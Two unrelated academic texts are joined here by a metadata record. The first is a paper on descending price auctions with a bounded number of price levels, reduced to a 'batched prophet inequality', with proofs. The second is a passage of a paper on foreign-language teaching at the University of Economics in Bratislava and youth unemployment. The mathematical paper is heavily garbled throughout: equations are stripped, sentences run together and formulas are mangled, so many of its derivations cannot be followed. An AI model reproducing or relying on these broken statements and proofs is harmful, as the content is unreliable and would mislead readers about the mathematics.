Proposition 1. Fix a value distribution G. For any given sequence of strictly decreasing prices p, there exists a sequence of thresholds (ii) We have τ k = p k and the thresholds τ 1 , . . . , τ k−1 satisfy We defer the proof of Proposition 1 to Appendix A. We highlight that Eq. (3) is the indifference conditions for a buyer with value τ j : if she purchases at price p j , the left-hand side is her expected utility and if she purchases at price p j+1 , the right-hand side is her expected utility. Also, if a buyer with value v chooses a stopping round j, then we should have v ≥ p j to guarantee her individual rationality. Given our equilibrium characterization above, this property automatically holds as τ j ≥ p j for all j ∈ [k]. The proof is simple and based on backward induction: For j = k this is true as τ k = p k . Now assume τ j+1 ≥ p j+1 . Then the right-hand-side of Eq. (3) is non-negative as τ j ≥ τ j+1 ≥ p j+1 . Therefore τ j ≥ p j , completing the proof of the inductive step.
Given a value distribution G, our characterization defines a mapping Γ G : R k ≥0 → R k ≥0 that maps any sequence of strictly decreasing prices p to a sequence of (weakly) decreasing equilibrium thresholds τ , or equivalently maps a sequence of k distinct prices p 1 > . . . > p k to a sequence of k ′ ≤ k distinct equilibrium thresholds τ 1 > . . . > τ k ′ . 6 We next show that Γ G has an inverse, denoted by Γ −1 G , which helps us to translate equilibrium thresholds to prices. We postpone the proof of Proposition 2 to Appendix A.
Proposition 2. For any sequence of k strictly decreasing thresholds τ , there exists a sequence of k strictly decreasing prices p = Γ −1 G (τ ) such that the corresponding buyers' symmetric Bayes-Nash equilibrium is determined by thresholds τ .
Equipped with Propositions 1 and 2, the auctioneer can directly work with the sequence of equilibrium thresholds instead of the sequence of prices in the revenue maximization problem.
Based on this idea, we next reformulate the auctioneer's problem in terms of an alternative problem which we call batched prophet inequality.
Reduction to "Batched Prophet Inequality"
We start this section by defining the following variant of the basic prophet inequality problem Samuel-Cahn [1984], which is intimately connected to our analysis of the k-DPA.
Definition 2 (Batched Prophet Inequality). Consider a decision-maker maximizing her expected reward in a sequential game with k rounds. Before the beginning of the game, the decision-maker picks k thresholds τ 1 > τ 2 > . . . > τ k . Then n rewards V 1 , . . . , V n are drawn independently from distribution F (known by the decision-maker). The game then starts from round 1. At each round i, if all the rewards are below threshold τ i , the game advances to next round i + 1. Otherwise, the decision-maker wins one of the rewards that passes threshold τ i uniformly at random and the game ends. If no reward passes any of thresholds until the end of round k, the game ends with decision-maker winning zero reward.
If the decision-maker knows the reward realizations, the expected optimal reward is: Note that V i 's are allowed to be negative, but the decision-maker has always the option of rejecting any negative rewards by choosing τ k ≥ 0. We are interested in designing thresholds τ to maximize the ratio of the expected reward of the decision-maker, denoted by ALG(τ 1 , . . . , τ k ), to the offline benchmark OPT. This ratio is known as the competitive ratio: To make a connection between the problem of maximizing the competitive ratio in the batched prophet inequality setting and the revenue approximation ratio of k-DPA versus the Myerson's optimal mechanism (defined in Eq. (2)), we rely on two key observations: • We evaluate the expected revenue of our k-DPA at its symmetric BNE. As a result, we can rely on Myerson's payment/revenue equivalence lemma [Myerson, 1981] to simplify our analysis: for regular distributions, the expected revenue of k-DPA is equal to the expected virtual value of the winner.
• Suppose the auctioneer selects a sequence of equilibrium thresholdsτ 1 > . . . >τ k (as in Proposition 1), which can always be induced by a sequence of prices p 1 > . . . > p k , where p = Γ −1 G (τ ) (as in Proposition 2). Then we can simulate the winner-selection process of k-DPA by finding the first round j in which one of the buyers v 1 , . . . , v n passes thresholdτ j , and picking one such buyer uniformly at random.
Now consider an instance of the batched prophet inequality where
This claim simply holds as φ G is increasing due to regularity. Note that φ G (τ k ) = τ k > 0, and hence no buyer with a negative virtual value can ever be a winner in the resulting k-DPA. Now, the offline benchmark of the batched prophet inequality is the same as the expected revenue of Myerson's optimal auction, i.e., The final step is translating thresholdsτ i = φ −1 G (τ i ) to prices. This can be done using Proposition 2, which results in p = Γ −1 G ([τ i ] i∈N ). Putting all pieces together, the revenue approximation of k-DPA with prices p is equal to the competitive ratio of thresholds τ picked by the decision-maker in the above batched prophet inequality instance.
We end this section by showing how the problem of finding optimal sequence of thresholds in batched prophet inequality can be reformulated as a simple dynamic programming.
Dynamic Programming: Initially the decision-maker only knows the prior distribution of the rewards and nothing more about their realizations. Yet, the decision-maker knows when the game reaches round j, her information about the reward distribution is going to change. In particular, if round j has arrived and no reward is collected, then the decision-maker should know all the past rewards are smaller than τ j−1 , and her posterior belief about the rewards would change to the conditional CDF F (v) F (τ j−1 ) over the support [0, τ j−1 ). Therefore, the state of the system at any round is the remaining number of rounds and the current upper bound on the distribution of rewards (i.e., the lowest threshold so far). We denote by
Ψ(t, θ)
the optimal expected reward if t rounds are remaining and all the rewards are known to be smaller than θ. The following is the Bellman update equation for computing the optimal expected reward starting from state (t, θ): where V ∼ F . We note once a threshold θ ′ is picked at state (t, θ), if the set of rewards S ⊆ [n] passing θ ′ is non-empty, then the conditional expected collected reward is equal to: which is used in the term corresponding to instantaneous reward in Eq. (5). The recursion in Eq. (5) highlights the tradeoff that the decision-maker is facing: by increasing θ ′ , the probability of collecting instantaneous reward (i.e., 1 − F (θ ′ ) , the probability of future rewards (i.e., F (θ ′ ) F (θ) n ) and the expected future reward (i.e., Ψ(t − 1, θ ′ )) increases.
Given the above formulation, the optimal expected reward obtained by k thresholds (and the thresholds themselves) can be evaluated by computing Ψ(k, ∞) recursively. However, it is not clear how well these thresholds can approximate the optimum offline reward OPT as a benchmark.
We address this question in the next section.
Batched Prophet Inequality for a Single Item
In this section, we focus on the single item batched prophet inequality problem (Definition 2). We first introduce a simple sequence of thresholds that geometrically span the quantile space (Section 3.1), and show they provide a competitive ratio against OPT as a function of k that converges to 1 exponentially fast (Section 3.2). We further show how to use this result to design price sequences/bid levels in a k-DPA to obtain approximations to revenue and welfare (Section 3.3). As neither the decision-maker nor the offline benchmark ever accept a negative reward, we assume W.L.O.G that all values in support of F are non-negative in Section 3.1 and Section 3.3. We revisit this subtle point in Section 3.3 when we design our final prices (as virtual values can be negative).
Approximations Using Balanced Thresholds
As the main result of this section, we establish that there exists a sequence of k thresholds for the decision-maker that achieves 1 − 1/e k of the optimum offline reward OPT in the batched prophet inequality problem. Here, we assume rewards are non-negative.
Theorem 1. The following sequence of thresholds achieves 1 − 1/e k of the optimum offline reward OPT as the expected reward of the decision-maker in the batched prophet inequality problem: Remark 1. For the special case of k = 1, our problem boils down to designing a static threshold for the i.i.d. prophet inequality problem [Correa et al., 2017] or prophet secretary problem (with homogeneous buyers) . As it has been established in the prior work, no static policy can obtain a competitive ratio better than 1 − 1/e, and hence our result is tight for k = 1. As we show next, our analysis is also tight for general k.
Warm Up (Uniform Distribution):
Before providing the proof sketch, let us show how the bound 1 − 1/e k appears in an example with uniform distribution over [0, 1]. Letting α = 1 e 1 n , the thresholds prescribed in Theorem 1 become τ j = α j for j = 1, . . . , k.
The expected reward of the decision-maker by using these thresholds becomes This is because with probability α (j−1)n − α jn the maximum of rewards {V i } i∈[n] falls into interval [α j , α j−1 ). In this case, the game ends by the end of round j, while the expected collected reward conditioned on reaching to round j is 1 2 α j−1 + α j . We can rewrite (6) as where the last equality follows by plugging in α = 1 e 1 n . The optimum offline reward OPT, on the other hand, is equal to We next compare the performance of our thresholds given in (7) to the optimal offline reward given (8 establishing the 1 − 1 e k competitive ratio against the optimum offline reward as a benchmark.
Proof Sketch of Theorem 1 for General Distributions
Here, we provide the proof sketch of Theorem 2 and relegate the details to Appendix A. By choosing the first threshold τ 1 , we obtain at least a reward of τ 1 if at least one of the random variables is above this threshold. In addition to τ 1 , we obtain the difference between the random variable V i that is selected (if any) and the threshold τ 1 , i.e., There is a chance that this selected random variable is the highest random variable and by bounding this probability we establish that the expected instantaneous reward, i.e., expected reward obtained by selecting the first threshold, is at least where for any x ∈ [0, 1] we define the polynomial P n (x) as Equation (9) manifests the first tradeoff that the decision-maker is facing: by selecting a threshold τ 1 , she balances the terms τ 1 and E[(V max − τ 1 ) + ], which are increasing and decreasing in τ 1 , respectively.
To gain some intuitions, let us first consider the simpler case of k = 1. If we only had one round, the decision-maker could safely aim to only maximize the instantaneous reward (as there are no future rounds). To this end, the optimal threshold should make both coefficients (1−F (τ 1 ) n ) and P n (τ 1 ) large. We show that it is possible to have In particular, for F (τ 1 ) = 1 − 1 n the above inequality holds. We can then use the fact that establishing the 1 − 1 e competitive ratio for k = 1. In fact, this result is closely related to the well-known Bernoulli selection lemma (see Correa et al. [2017], ) and online contention resolution schemes for i.i.d. variables under random order (see Yan [2011], Lee and Singla [2018]). These techniques also lead to the well-known result that there exits a static threshold for the i.i.d. prophet inequality problem that obtains the approximation ratio 1− 1/e, and our analysis for this special cases provides an alternative proof for it.
However, we are interested to approximate the expected reward for any k ≥ 1 number of rounds, where the decision-maker is allowed to use k different thresholds. Here, the decisionmaker not only should try to keep the instantaneous reward high, she should also hedge against the future and have an eye on the expected reward of future rounds.
To guide the analysis, let us consider the expected reward of the second round. With probability F (τ 1 ) n , all random variables are below τ 1 and we get to the second round. The stage-reward of the second round is the same as the first round by replacing the distribution F (x) with F (x) F (τ 1 ) , which is basically the distribution of V i conditioned on V i < τ 1 . We can write Equation (12) manifests the second tradeoff that the decision-maker is facing: by choosing τ 1 she needs to make min{(1− F (τ 1 ) n ), P n (F (τ 1 ))} large, but crucially she needs to make the term F (τ 1 ) n large enough at the same time. We next show in the following lemma that it is possible to satisfy (11) while having F (τ 1 ) n ≥ 1 e . We postpone its proof to Appendix A. Using Lemma 1, we can further bound (12) as which again uses the fact that τ + n i=1 E[(V i − τ ) + ] ≥ OPT for any τ , completing the proof.
The Price Trajectories for Revenue and Welfare Approximations
Theorem 1 finds an approximately optimal sequence of k distinct thresholds in the batched prophet inequality setting. Using the reduction of Section 2.4, we can determine the equilibrium thresholds of our final k-level descending price auction, as well as its set of k distinct prices/bid levels supporting this equilibrium. The only subtle difference is that V i = φ G (v i ) can take negative values when v i < ρ φ −1 G (0). However, neither the decision-maker nor the optimal offline benchmark should accept any negative V i (which is equivalent to allocating to a buyer with negative virtual value). We handle this subtlety by basically focusing on the subset of buyers for which v i ≥ ρ, and constructing our thresholds by invoking Theorem 1 for the conditional distribution We summarize our procedure for constructing these prices in Algorithm 1.
Algorithm 1: Price construction of k-DPA for approximating optimal revenue Input: number of distinct prices k ∈ N, buyers' (regular) value distribution G Output: sequence of prices p 1 > p 2 > . . . > p k Define ρ φ −1 G (0) and α 1 e 1/n for j = 1, . . . , k do Theorem 2. The k-level descending price auction for selling a single item to i.i.d. buyers, with prices constructed by Algorithm 1, achieves an expected revenue no less than 1 − 1 e k of the optimal revenue. We defer the proof of Theorem 2 to Appendix A.
Remark 2. So far the focus of our paper has been on maximizing expected virtual welfare, which is equivalent to maximizing expected revenue. However, the same approach can help us to find a sequence of prices, so that the expected value of the winner of the k-DPA approximates the expected maximum social welfare, To this end, we only need to define an instance of the batched prophet inequality problem where V i = v i , and then use the thresholds τ in Theorem 1 as equilibrium thresholds (assuming V i ∼ G). (3) with the fact that G(τ j ) = 1 e j/n for j = 1, . . . , k results in a sequence of prices p satisfying: p j = 1 e j/n 1 − 1 e (n−1)/n + 1 e (n−1)/n p j+1 for j = 1, . . . , k − 1,
Combining Proposition 2 and Equation
with the initialization p k = G −1 1 e k/n . The proof is similar to (and somewhat simpler than) that of Theorem 2 and omitted for brevity. Figure 1: The sequence of prices and the corresponding thresholds that determine the equilibrium for uniform distribution over [0, 1], n = 10 buyers, and k = 5 rounds: (a) the prices and the corresponding thresholds that determine the buyer's equilibrium for approximating welfare and (b) the prices and the corresponding thresholds that determine the buyer's equilibrium for approximating revenue Figure 1 illustrates the price and the equilibrium trajectories described in Theorem 2 and Remark 2 for an example with n = 10 buyers whose values are drawn from uniform distribution over [0, 1], and with k = 5 price levels for approximating the optimal welfare and the optimal revenue.
We observe that in the last round the prices and the equilibrium threshold coincides, but for any of the early rounds the buyers purchase only when their value is larger than a threshold which is strictly larger than the price. This is because of the competition among buyers: by waiting, or equivalently settling for a lower price in the auction, even though buyers face a lower price, the competition among buyers increases and the chances of acquiring the item decreases.
Extension to Multiple Items
So far we considered a setting in which the seller has a single item. In this section, we extend our results to a setting with m ≥ 2 identical items and n unit-demand buyers.
The environment
As in our base model, the seller announces a sequence of k prices and the buyers simultaneously decide the price at which they accept to purchase the item. Similar to this baseline model, for any descending sequence of prices p, there exists a sequence of thresholds τ 1 ≥ τ 2 ≥ . . . ≥ τ k > 0 that characterize the buyer's equilibirum: Proposition 3. Fix a value distribution G. For any given sequence of strictly decreasing prices p, there exists a sequence of thresholds +∞ τ 0 > τ 1 ≥ τ 2 ≥ . . . ≥ τ k > 0 such that the symmetric Bayes-Nash equilibrium b * for the buyers is to bid p j (or equivalently stop at the price of round j) if their valuation is in [τ j , τ j−1 ) for j ∈ [k] and bid 0 (or equivalently never stop at any price) if their valuation is smaller than τ k .
This proposition is the analogue of Proposition 1 for multiple items. In the proof of this proposition, given in the appendix, we also provide an explicit characterization of the equilibrium thresholds in terms of the sequence of prices.
Batched Prophet Inequality for Multiple Items
Similar to our baseline analysis for a single item, if the decision-maker knows the reward realizations, the expected optimal reward becomes where V (i) is the i-th top value and by convention for ℓ = 0 the reward is zero. This expression is the expectation of the total reward when the decision-maker can take up to m rewards. We are interested in designing thresholds τ to maximize the ratio of the expected reward of the decisionmaker, denoted by ALG m (τ 1 , . . . , τ k ), to the offline benchmark OPT. That is the competitive ratio, given by
Approximations Using Balanced Thresholds for Multiple Items
In this section, we devise a sequence of k thresholds for the decision-maker and establish its approximation of the optimum offline reward OPT m in the batched prophet inequality problem with m > 1 items.
Theorem 3. For any m ≥ 2 items and k ≥ 1 rounds, there exists N (ǫ) such that the sequence of thresholds of the optimum offline reward OPT m as the expected reward of a decision-maker that can acquire up to m rewards in the batched prophet inequality.
In the rest of this subsection, we provide the proof of this theorem.
For any τ , we let where V (i) is the top i-th random variable. We also define the following polynomials: Using these notations, we can write the expected welfare as mτ 1 A(n, m, F (τ 1 )) + S + (τ 1 )B(n, m, F (τ 1 )) . . .
where (a) follows from the following argument. For any r ∈ {2, . . . , k}, the coefficient of where the equality holds because both sides are the probability of having i r many values above τ r .
Given that mτ r + S + (τ r ) ≥ OPT m for all r = 1, . . . , k, and similar to the proof Theorem 1, we need to choose the sequence of thresholds to (i) maximize and (ii) to make sure n i r (1 − F (τ r )) ir F (τ r ) n−ir is large enough. In the next lemma we establish the existence of thresholds that achieve both goals Moreover, for any ǫ > 0, there exists N (ǫ) such that for n ≥ N (ǫ): We defer the proof of this lemma to the appendix and continue with the proof of Theorem 3 by using this lemma.
We next lower bound the expression in (15). First note that for all r ∈ {1, . . . , m} Using Lemma 2 and (16) This completes the proof.
We conclude this section by noting that Theorem 3 covers the result of Arnosti and Ma [2021] that establishes 1 − e −m m m m! for a single threshold and a more involved proof technique than our analysis.
Conclusion
Motivated by applications where the auctioneer is aiming to have less rounds of communications with buyers, we consider the descending price auction with a bounded number of price levels.
As our main result, establish how well it can approximate the optimal revenue auction. In our problem formulation, an auctioneer with m identical items posts k prices and then multiple unitdemand buyers with i.i.d. values decide about their bids. To guide the analysis, we introduce a new variant of prophet inequality, called batched prophet inequality, in which the decision-maker decides about k (decreasing) thresholds and then sequentially collects rewards (up to m) that are above the thresholds by breaking ties uniformly at random. This variant of the classic prophet inequality is of independent interest, but we prove that the auctioneer's problem with bounded number of prices reduces to batched prophet inequality and then turn our attention to finding policies for the batched prophet inequality with optimal competitive ratio. For a single item, we establish the existence of a policy for the batched prophet inequality that achieves 1 − 1/e k of the optimal. Therefore, by increasing k, the revenue of a properly designed descending price auction with k price levels converges exponentially fast to the optimal revenue. We then extend our analysis for the batched prophet inequality, and therefore descending price auction with k bids, to a setting with multiple items.
Proof of Proposition 1
To show part (i) of Proposition 1, it is enough to show that the mapping from any buyer's value to its equilibrium bid, denoted by b * (v), is monotone non-decreasing in v. This implies that b * (v) is a non-decreasing step function, and that the equilibrium can be identified by a sequence of weakly decreasing thresholds τ 1 ≥ τ 2 ≥ . . . τ k , as described in the statement of part (i) of Proposition 1.
Note that we only show b * (v) is a step function with k ′ ≤ k distinct steps, with step values being a strictly decreasing sub-sequence of p 1 > p 2 > . . . > p k . In principle, our price sequence might not be minimal, meaning that k ′ < k.
Fix the bidding strategies of all buyers in N except i. Consider values v 1 < v 2 for buyer i. Let b 1 = b * (v 1 ) and b 2 = b * (v 2 ). Moreover, let x 1 and x 2 be the allocation probabilities for buyer i given bids b 1 and b 2 , respectively. First suppose buyer i's value is realized to be v 1 . Because b 1 is her best-response bid under value v 1 , we have: Now suppose buyer i's value is realized to be v 2 . Because b 2 is her best-response bid under value v 2 , we have: Summing up the above inequalities and rearranging the terms, we have: Therefore, as v 1 < v 2 , we should have x 1 ≤ x 2 . Note that in k-DPA the allocation probability of buyer i as a function of her submitted bid is increasing. Therefore, b 1 ≤ b 2 , as desired.
To show part (ii) of Proposition 1, we develop the indifference condition for buyers. To be more formal, suppose all other buyers except buyer 1 play with the BNE strategy b * in part (i). Now suppose buyer 1's value is v = τ j + ǫ for small enough ǫ > 0. Then the expected utility of such a buyer when selecting price p j should be no more than when selecting price p j+1 . Now suppose buyer 1's value is v = τ j − ǫ for small enough ǫ > 0. Then the expected utility of such a buyer when selecting price p j+1 should be no more than when selecting price p j . Taking the limit as ǫ → 0 indicates that the expected utility of a buyer with value τ j should be the same under bidding either p j or p j+1 . Now suppose round j with price p j has arrived. If a buyer with value v accepts this price, her expected utility will be
Proof of Lemma 1
We can write which is increasing in x. The function 1 − x n is decreasing in x. Making these two equal results in We now evaluate 1 − x n (and therefore P n (x)) at this point:
This establishes for
However, x n is not necessarily large. We next show how we can choose another x that satisfies both criteria. This completes the proof.
By using Lemma 1 multiple times, and using the fact that τ + n i=1 E[(V i − τ ) + ] ≥ OPT for any τ , we can further bound (19)
Proof of Theorem 2
Given buyer values v 1 , . . . , v n ∼ G in the k-DPA problem, consider an instance of the batched prophet inequality problem with i.i.d. rewards . Define the randomized setN = {i ∈ [n] : v i ≥ φ −1 G (0)}. Buyers inN are the only buyers whose virtual value is non-negative. Therefore Now fix a particular realizationN = S for some S ⊆ [n]. Note that conditioned on the event N = S, as V i 's are i.i.d., any V i for i ∈ S is drawn from the same conditional CDF where ρ = φ −1 G (0). We now invoke Theorem 1 with rewards being |S| i.i.d. non-negative random variables drawn from distributionF (x) (with support [0, +∞)), in order to obtain k thresholds τ 1 > . . . > τ k > 0. Based on the construction of these thresholds, we can writẽ F (τ j ) = 1 e j/n , for j = 1, . . . , k , and therefore we have: 1 − G(ρ) e j/n + G(ρ) , for j = 1, . . . , k.
Note that the choice of these thresholds does not depend on the exact realization S. Now, by applying the competitive ratio lower-bound of Theorem 1 for this instance, we have: E ALG(τ 1 , . . . , τ k ) |N = S ≥ 1 − 1 e k E max i∈S V i |N = S .
By taking expectation overN , we have Now, applying the reduction in Section 2.4, we know if (i) we setτ j = φ −1 G (τ j ) and use {τ j } j∈[k] as the equilibrium thresholds of a k-DPA against the original buyers, and then (ii) we use Proposition 2 and Equation (3) to obtain prices p supporting these equilibrium thresholds, then: Moreover, the expected revenue of Myerson's optimal mechanism is equal to: and hence using prices p in k-DPA will result in the desired approximation ratio. Now, from Eq. (20) and the fact thatτ j = φ −1 G (τ j ) we have: G (τ j ) = (1 − G(ρ)) α j + G(ρ) , for j = 1, . . . , k , where α = 1 e 1/n .
Proof of Proposition 3
The proof of this proposition is similar to that of Proposition 1. We next develop the indifference condition for buyers. If a buyer with value v accepts this price, her expected utility will be m r=0 n−1−r ℓ=0 n − 1 r (1 − F (τ j−1 )) r F (τ j−1 ) n−1−r min m − r ℓ + 1 , 1 n − 1 − r ℓ If she accepts the price p j+1 in round j + 1, her expected utility becomes m r=0 n−1−r ℓ=0 n − 1 r (1 − F (τ j )) r F (τ j ) n−1−r min m − r ℓ + 1 , 1 n − 1 − r ℓ The indifference condition then implies that the above two utilities are equal for v = τ j , which leads to the equations in the statement of the proposition.
Proof of Lemma 2
We first establish that B(n, m, x) = mA(n, m, x) n(1 − x) .
To see this notice that where (a) follows from Yan [2011, Lemma 4.2] and the fact that the right-hand side is the limit as n → ∞ and (b) holds because we have a telescopic summation. This completes the proof. | 2022-03-04T06:47:10.893Z | 2022-03-02T00:00:00.000 | {
"year": 2022,
"sha1": "e0547ca198688b9511fcaa9c9ff9ff115a1ac349",
"oa_license": null,
"oa_url": null,
"oa_status": null,
"pdf_src": "Arxiv",
"pdf_hash": "f4e083df26f8bde6ce0ca329cbf561f5a0acb1c5",
"s2fieldsofstudy": [
"Economics"
],
"extfieldsofstudy": [
"Computer Science",
"Economics"
]
} |
158346943 | pes2o/s2orc | v3-fos-license | TEACHING FOREIGN LANGUAGES AT THE UNIVERSITY OF ECONOMICS IN BRATISLAVA IN CONNECTION TO THE NEEDS OF THE LABOUR MARKET
The objective of the authors of the article was to analyse the labour market from the point of view of languages used by individual foreign companies in Slovakia. Since insufficient language competence of employees is one of the causes of youth unemployment in the European Union, the paper focuses also on language preparation of the students at the University of Economics in Bratislava, and contemplates the fact whether real foreign language knowledge of the graduates meets the requirements of the labour market, and whether the curricula of individual subjects reflect these requirements. English was proven to be the most frequently selected foreign language by the students, followed by German. Since there are many American, British, as well as German and Austrian companies located in Bratislava, we find this situation rather positive. However, we highly recommend students to acquire at least basic knowledge of German in order to increase their competitive advantage.
Introduction
The University of Economics in Bratislava (hereinafter referred to as "UEBA") belongs to the topranked providers of higher education in the Slovak Republic with its history dating back to 1940.Throughout its existence, the structure and the name of the institution had been amended several times, until the adoption of the Act no.292/1992 Coll., when the actual name was adopted (Slov-Lex, 2017).Currently, it is composed of 7 faculties, 6 of them located in Bratislava (Faculty of National Economy, Faculty of Commerce, Faculty of Economic Informatics, Faculty of Business Management, Faculty of International Relations and Faculty of Applied Languages), 1 with its premises located in Košice (Faculty of Business Economy).From its foundation on, more than 80 thousand students have successfully graduated from this institution.Approximately 12 thousand students are currently studying various economics-related disciplines at the UEBA (University of Economics in Bratislava, 2017).
Apart from knowledge of economics and related disciplines, each graduate from the UEBA is supposed to possess communicative competence in at least two foreign languages, which is also in line with the intention of the European Union regarding language competence of its citizens.
The main objective of this paper is to analyse teaching foreign languages at the University of Economics in Bratislava in connection to the language-related requirements of the labour market, predominantly from the point of view of foreign enterprises and their requirements regarding language competence of their employees.
The primary research objective is to analyse whether the foreign language teaching at the UEBA is sufficient enough to meet the requirements of the labour market, predominantly in Bratislava and surrounding areas.We attempt to provide the answer on the question whether graduates from the UEBA dispose of language competence equivalent to the requirements of their potential employers.Based on the research results, possible improvements measures will be proposed whose implementation might help to cover potential niches.Such measures may repose in increasing the number of teaching hours or seminars for the languages requiring more attention.The largest international companies in Bratislava will be discussed with regards to their corporate language.The result of this analysis will be confronted with the language learning opportunities for students of the UEBA.The research is based on an assumption that creators of learning programmes at the UEBA take the situation and developments on the labour market into account when deciding on the content of study plans.
A fact is that the unemployment of young people (regarding youth unemployment, usually people aged 15 -24 years are referred to) represents a serious problem for the European Union (Harakaľová, 2016, p. 164).This may be, besides others, due to foreign language competence being insufficient to meet requirements of the labour market.
Methodology
The present research is based on the analysis of languages offered by the UEBA to students as part of the curricula, and thus from the quantitative point of view.Concrete numerical data provided by the Faculty of Applied Languages reflecting numbers of students enrolled for particular foreign languages is analysed.On the grounds of this, the languages are organised according to the students´ preferences.Data from the academic year 2013/2014 is used, since data from further academic years has not been processed.Therefore, we assume that the current state would be very similar.
Next, the largest companies in Bratislava and the whole region are analysed.Special attention is paid predominantly to companies´ countries of origin, or countries, where the companies have their headquarters.Although English is generally required by almost every employer, we suppose that in each company also the language of its home country is, at least for some job positions, necessary.For the purpose of the research, we consider the language of the country of origin to be the corporate language, which is likely to be required by the hiring managers.This helps us to evaluate, what languages are most frequently sought by applicants.
Consequently, an analysis of the languages that are taught at the university and those which are required by employers will enable us to conclude, whether foreign language teaching at the UEBA meets the needs of the labour market, or whether certain improvement measures could be proposed.
Foreign language competence in the European Union
With regards to European language policy, one of the primary objectives of the European Union is to strengthen language competence of its citizens.More exactly, every citizen of EU-member states is supposed to master at least 2 foreign languages.This should be executed by means of language learning, which is funded by various programmes and projects.The reason behind the EU´s interest in language learning support is the idea of languages being a significant part of European identity as well as an explicit expression of a culture.Linguistic diversity in Europe is therefore considered to be a key phenomenon.Furthermore, language competence is thought to be one of the skills improving opportunities on the labour market (European Parliament, 2016).
The idea of mastering at least 2 foreign languages emerged in 2002.The report points at the need "to improve the mastery of basic skills, in particular by teaching at least two foreign languages from a very early age: establishment of a linguistic competence indicator in 2003..." (Barcelona European Council, 2002, p. 19).
According to the Statistical Office of the European Union, foreign language competence among its citizens, citizens of Slovakia and its neighbouring countries (apart from Ukraine, since Ukraine as a nonmember state was not included in the research) aged 25-64 was 2011 as demonstrated in the Figure 1 (%) (Eurostat, 2015).
Figure 1.Foreign language competence in chosen EU-countries Source: Own processing according to Eurostat
It is important to mention that foreign language competence is considered to be a success factor in the international workspace.In Bratislava, which is not only the capital of Slovakia but a political, economic and business centre of the Republic and one of the richest regions in the European Union with a variety of multinational corporations, the ability to communicate in a foreign language is a necessity.Comparing the situation in Slovakia in 2011, when 14.70% of people claimed not to speak any foreign language, with its neighbouring countries, the outcome is a relatively positive finding in favour of Slovakia.Furthermore, it was deeply under the EU-28 average, which amounted to 34.30%.Besides that, the data indicate an interesting trend, as even 21.60%Slovaks reported themselves as knowing 3 or more languages.This also differs significantly from the EU-28 average (8.80%) (Figure 1).
For the purpose of this paper, we suppose that foreign language competence of the young generation (up to the age of 24) might be on a very similar level.
Youth unemployment as a negative trend in Europe
As already mentioned, unemployment of young generation represents a crucial problem in the European Union, especially in Spain, Greece, Croatia, Italy, Portugal and Cyprus.The youth unemployment rate has been declining since 2013, although not in every country.Despite the decline in unemployment of young people, the rate remains on a high level.One of the consequences of this development is a significant difference among countries (Harakaľová, 2016, p. 165).
In the context of the major European Union proposals, the strategy "Europe 2020", the initiative from this framework "Youth on the move" should be mentioned, since it concerns education and employment of young people.The objective of tackling the unemployment of the young generation is closely linked to the more general aim of the European Union consisting in the achievement of 75 % employment rate in working population (persons aged 20-64 years) (Harakaľová, Lipková, Grešš, 2015, p. 320).In addition, not only unemployment, but also social exclusion is a problem the European Union needs to face and is aware of (Šoltés, Šoltésová, Hrivíková, 2016(Šoltés, Šoltésová, Hrivíková, , p. 1692)).
Despite the fact that the youth unemployment rate in Slovakia is still on a relatively high level, we can see a positive trend because of decline in numerical data.In 2013, the youth unemployment rate in Slovakia constituted 33.70%; in 2014, it was reduced to 29.70%, and further declining.In 2015, it was already 26.50%(Eurostat, 2017).Only throughout the year 2016, the youth unemployment rate in Slovakia lowered from 24.8% in January to 20.4% in December.The fall thus represents approximately 4.4% (Trading Economics / Eurostat, 2017).According to the Trading Economics forecast, the youth unemployment rate in Slovakia will continue to decline, reaching 17.58% in 2020.The last prediction comes from 24 February 2017.
The development on the EU-wide level is different from Slovak trends.Throughout 2016, the data was fluctuating between 18,5% and 19,3%.(Trading Economics / Eurostat, 2017).The difference between the youth unemployment rate at the beginning and the end of the year was thus less significant than in Slovakia.Although the youth unemployment rate in the European Union as a whole was not only declining, but even increasing or stagnating, the nominal rate was lower than that in Slovakia (Figure 2).The analysed data proves the fact that the unemployment of young generation is a problem that needs to be dealt with.Youth unemployment may in some cases result in a long-term unemployment (Bugárová, 2016, p. 22).When talking specifically about the unemployment of graduates, Slovakia belongs to the EUcountries with the highest level of unemployed graduates (Bugárová, 2016, p. 28).The reason for this trend may be, apart from other factors, insufficient foreign language competence.The chance to succeed in the labour market can then be relatively low.We, therefore, agree with the objective of the European Union and believe, it is necessary to acquire foreign language competence corresponding to the needs of the labour market.Without language skills, it may nowadays be a serious problem to find employment meeting one´s needs and requirements.
Language skills can be considered a component of one's qualification.The research by Lučkaničová, Ondrušeková and Rešovský (2012) depicts a marked trend for employers in Slovakia to prefer educated young people with prospects, while at the same time require a high level of qualification and relevant experience (p.35).
Moreover, also young people's preferences regarding their potential employer have been undergoing some changes.Grencikova, Spankova and Karbach (2015) describe this tendency as follows: "Young people do not want to have a fixed, single career, instead, they are going to work for multiple employers and be independent" (p.294).
Foreign languages taught at the University of Economics in Bratislava
Although most of the students attending the UEBA are Slovak citizens with Slovak being their mother tongue, and also majority of the learning programmes taught at the UEBA is conducted in Slovak, there are also programmes offered in a foreign language, such as International Financial Management (Internationales Finanzmanagement) in German, Sales Management (Managment de la Vente) in French and General Management and International Finance in English.Apart from that, there is also a learning programme in Foreign Languages and Intercultural Communication at the Faculty of Applied Languages taught in English or German (University of Economics in Bratislava, 2017).As far as the structure of Slovak learning programmes is concerned, each of them also contains a foreign language unit.
Students of the UEBA can choose one of the following foreign languages: English, German, Spanish, French, Russian and Italian, and even Slovak for those having a different mother tongue.If needed, a Chinese or Arabic language class can be opened.In the academic year 2013/2014 the share of languages based on the number of students was as shown in Table 1 (the abbreviation FT stands for full-time; PT for part-time): It is obvious that the English language has the highest representation among students and is followed by German.The third most taught foreign language was Spanish, followed by French, Russian and Italian.The lowest number of students chose Slovak as a foreign language.Those are mostly exchange students.
Taking exclusively the active students into account, the percentage calculations of the individual languages would be as follows: 34.71% of full-time students and 45.88% of part-time students learnt English in the summer semester of the academic year 2013/2014.During the same semester 29.12% of full-time and 36.47% of part-time students chose German as a foreign language.In the winter semester, the numbers were slightly different, and thus 48.18% of full-time and 59.59% of part-time students attended an English course while 21.12% of full-time and 29.50% of part-time students attended a German language course.Representation of other languages was much less significant.
As far as following academic years are concerned, we suppose very similar data would have been obtained also in the academic years 2014/2015, 2015/2016 and the current one.However, the exact numerical data is not at our disposal because it has not been processed.The data presented above will thus be considered to mirror the current situation as well.
The largest companies in Bratislava as potential employers of the UEBA graduates
